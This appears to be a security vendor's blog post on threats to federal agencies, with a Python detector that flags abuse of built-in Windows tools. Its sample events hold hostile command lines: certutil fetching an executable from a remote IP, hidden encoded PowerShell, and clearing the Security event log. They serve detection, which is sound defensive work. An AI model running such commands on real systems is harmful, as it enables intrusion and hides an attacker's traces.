Recent Accenture research found that targeted cyberattacks against federal agencies have grown in both number and sophistication throughout 2019-20, and counting speculative attacks increases that total even further. The study also found that agencies have made progress in both securing their enterprise and responding more effectively to intrusions.
But the size and scope of the recent Sunburst supply chain cyberattack demonstrates that our adversaries remain agile, adaptive, and determined in their efforts to exploit vulnerabilities in agency networks and the broader IT ecosystem.
Emerging analysis indicates that this was an especially sophisticated attack, of a type that is fortunately rare. But even the commodity attacks that agencies face daily are growing in sophistication, according to Accenture’s 2020 Cyber Threatscape Report. Based on the work of Accenture’s cyber threat intelligence (CTI) gathering and analysis operation, which features analysts working globally across 25 different languages, the report contains important insights for federal agencies.
Our analysis identifies emergent trends and new patterns in adversary tactics, techniques, and procedures (TTPs) — the way attackers are starting to behave today and will continue to behave tomorrow. Sunburst underlines the need to continually consider new attack vectors and adapt our defenses accordingly. While published prior to the discovery of this latest attack, the report offers valuable insights into other continuing threats and risks facing network defenders.
Five trends identified in the report have specific implications for federal agencies:
Increasingly sophisticated attacks on business continuity platforms.
Internet-accessible resources like mail servers have always been tough to defend and — because of the volume of different kinds of traffic they handle — easy for attackers to hide in. During the pandemic, they’ve become vital lifelines for federal agencies, as they have for many other enterprises. Now they’re the target of increasingly sophisticated attacks from nation-state level hackers.
These attacks target vulnerabilities in the platforms that remote work during COVID-19 depends on, such as VPN gateways and collaboration and communications tools. A successful intrusion into one of these platforms can provide a beachhead from which attackers relay commands, compromise e-mail, exfiltrate data, and harvest credentials.
Sophisticated actors hiding amid the white noise of low-level attacks.
These highly sophisticated and aggressive nation-state level groups use tools already present in the environment, such as built-in administration utilities and legitimate commercial software (“living off the land”), together with stealth tactics like log deletion or forging authentication tokens — similar to those reportedly employed by the Sunburst attackers — to thwart or complicate detection and attribution. The volume of noisy amateur attacks currently targeting federal networks makes it easier for such actors to survey and even attack without being detected — they can hide in the fog of war.
These stealth tactics highlight the need for detection based on behavior and heuristics rather than signatures alone. Traditional antivirus technology keyed on easily changed code signatures is blind to this kind of activity, because nothing malicious is ever written to disk. Instead, defenders need technologies that give them visibility into, for instance, which tools are run by which users on which hosts — enabling them to establish a baseline of what's normal and a picture of a known good state. Only in this way can defenders have a chance of spotting anomalies like benign tools being used in a malicious way.
A more mature security capability will automate repetitive low-level work and free human analysts up for exactly this kind of intelligence-driven threat hunting.
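As an added illustration (not code from the Accenture report or from this blog), the following Python sketch shows the baseline-then-anomaly approach described above applied to process-creation events. It learns which (user, tool) pairs are normal per host from a known-good window, then flags built-in binaries a principal has never run before, and separately flags argument patterns that are suspicious on their own, such as clearing an event log or using certutil as a downloader. The events, host names, user names and the IP address are all constructed for this example.

```python
"""Baseline-and-anomaly detection over process-creation events (illustrative).

1. Learn which (user, tool) pairs are normal on each host from a known-good window.
2. Flag built-in binaries ("living off the land") that a principal has never
   run before, and argument patterns that are suspicious regardless of history.
All events below are constructed samples, not real telemetry.
"""
import re
from collections import defaultdict

# Built-in Windows binaries frequently abused by intruders (assumed watch list).
LOLBINS = {"certutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "wmic.exe", "powershell.exe", "bitsadmin.exe", "wevtutil.exe"}

# Argument patterns that warrant an alert on their own: (label, regex).
SUSPICIOUS_ARGS = [
    ("event log cleared", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("certutil used as downloader", re.compile(r"certutil.*-urlcache.*-f\s+\S+", re.I)),
    ("encoded PowerShell command", re.compile(r"powershell.*\s-(e|enc|encodedcommand)\s", re.I)),
    ("rundll32 loading script", re.compile(r"rundll32.*javascript:", re.I)),
]


def tool_name(cmdline):
    """Lower-cased executable name of a command line; handles a quoted first token."""
    s = cmdline.strip()
    first = s[1:s.index('"', 1)] if s.startswith('"') else s.split()[0]
    return first.replace("\\", "/").rsplit("/", 1)[-1].lower()


def build_baseline(events):
    """Map each host to the set of (user, tool) pairs seen in a known-good window."""
    baseline = defaultdict(set)
    for ev in events:
        baseline[ev["host"]].add((ev["user"].lower(), tool_name(ev["cmdline"])))
    return baseline


def detect(events, baseline):
    """Return one alert per event that is either a never-before-seen LOLBin for
    that user on that host, or carries a suspicious argument pattern (or both)."""
    alerts = []
    for ev in events:
        tool = tool_name(ev["cmdline"])
        reasons = []
        if tool in LOLBINS and (ev["user"].lower(), tool) not in baseline.get(ev["host"], set()):
            reasons.append(f"{tool} never seen for {ev['user']} on {ev['host']}")
        for label, pattern in SUSPICIOUS_ARGS:
            if pattern.search(ev["cmdline"]):
                reasons.append(label)
        if reasons:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "tool": tool, "reasons": reasons})
    return alerts


def _ev(ts, host, user, cmdline):
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}


# Constructed known-good window: ordinary office and admin activity.
BASELINE_EVENTS = [
    _ev("2020-11-02T09:00:00Z", "WS01", "alice",
        '"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"'),
    _ev("2020-11-02T09:05:00Z", "WS01", "alice",
        '"C:\\Windows\\System32\\notepad.exe" C:\\Users\\alice\\todo.txt'),
    _ev("2020-11-02T10:00:00Z", "SRV01", "admin", 'powershell.exe -NoProfile -Command "Get-Service"'),
    _ev("2020-11-02T23:00:00Z", "SRV01", "svc_backup", 'wevtutil.exe qe Application /c:5'),
]

# Constructed observation window: two benign events and three that should alert.
OBSERVED_EVENTS = [
    _ev("2020-12-14T08:30:00Z", "WS01", "alice",
        '"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"'),
    _ev("2020-12-14T09:00:00Z", "SRV01", "admin", 'powershell.exe -NoProfile -Command "Get-Process"'),
    _ev("2020-12-14T09:12:00Z", "WS01", "alice",
        "certutil.exe -urlcache -split -f http://198.51.100.7/upd.exe C:\\Users\\alice\\upd.exe"),
    _ev("2020-12-14T09:13:00Z", "SRV01", "admin",
        "powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    _ev("2020-12-14T09:20:00Z", "SRV01", "admin", "wevtutil.exe cl Security"),
]


def run_example():
    """Build the baseline from the known-good window and scan the observed window."""
    return detect(OBSERVED_EVENTS, build_baseline(BASELINE_EVENTS))


if __name__ == "__main__":
    for alert in run_example():
        print(alert["ts"], alert["host"], alert["user"], alert["tool"], "->", "; ".join(alert["reasons"]))
```

Note the two distinct signals: the admin's encoded PowerShell is flagged even though PowerShell itself is baselined for that account, while wevtutil is flagged for the admin although the backup service account runs it every night. In production the baseline would come from weeks of EDR or Sysmon telemetry rather than a handful of events, and the watch list and patterns would be tuned to the environment.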
A new focus on ransomware.
The enormous profitability of ransomware has created a new generation of threat actors, with the funding to invest in novel, adaptive malware.
Five years ago, federal cyber defenders might have rightly dismissed ransomware groups as low-level malicious activity — and not something that a mature security operation would have to worry about. Now they have to be taken more seriously given the number of successful attacks across the broader public sector, within healthcare, and amongst critical infrastructure providers.
An agency’s extended network is especially vulnerable. Accenture’s Third Annual State of Cyber Resilience Report – Federal Edition found that 85% of federal respondents say that their organizations need to think beyond securing their enterprises and take steps to secure their ecosystems to be effective.
Connectedness has consequences.
Progress has been made in mitigating some categories of IoT vulnerabilities, but those gains are more than offset by all the new operational technology (OT) devices coming online. We have doubled the size of the attack surface by IP-enabling OT networks — and these networks are often managed by the facilities department rather than the IT department. The CISO may have zero visibility. And by the way, these are the systems that control the things that are really important to us, like power generation, water supply, and CCTV networks.
Threats against IoT and OT networks will continue to grow as organizations rely more and more on connected technologies. The lack of visibility into OT networks makes defending them more difficult and will require new solutions in both the corporate and government environments to detect and deter these threats.
Breaking down the cultural and bureaucratic barriers between OT and IT management is vital for security in the internet-of-everything world.
The need for adaptive security.
But the biggest takeaway is this: The new normal requires adaptive security and heralds the end of perimeter protection — defenders can’t rely on their firewalls and network security stacks anymore. Increased teleworking and the accelerated move to the cloud means the perimeter is everywhere.
Adaptive security is a cybersecurity mindset that emphasizes continuous monitoring to prepare for and adapt to new threats. It is how we approach Zero Trust, and it reflects the reality for our federal customers: this is a journey, not a destination. When the perimeter is everywhere and data has to be protected wherever it lives, a mature security capability is essential, as are strong identity proofing and multi-factor, continuous authentication.
But even to embark on the adaptive security journey, agencies must have the fundamentals in place. We can’t just flick a switch. We need a modern identity and access management infrastructure, for instance. We need to invest in those basic building blocks.
Managed security services enable security teams to outsource and automate repetitive tasks and concentrate on proactive, intelligence-driven threat hunting, pulling together curated CTI and using it to anticipate and emulate expected campaigns by nation-state level adversaries.
The pandemic changed everything — some security teams lost the visibility they needed, and the stacks no longer protect us the way they used to. Home networks are on the front line. And Sunburst changed everything again: More than ever, we need an end to siloed security operations centers — with each agency defending its own network against the same adversaries, duplicating the same repetitive tasks, and wasting the precious currency of our defenders’ time and attention. We need visibility across the entire .gov domain and partnership with our private sector suppliers — managed services can help provide that.
Special thanks to Accenture Federal Services’ Max Margolis (Threat Hunt Lead) for contributing his expertise to this blog.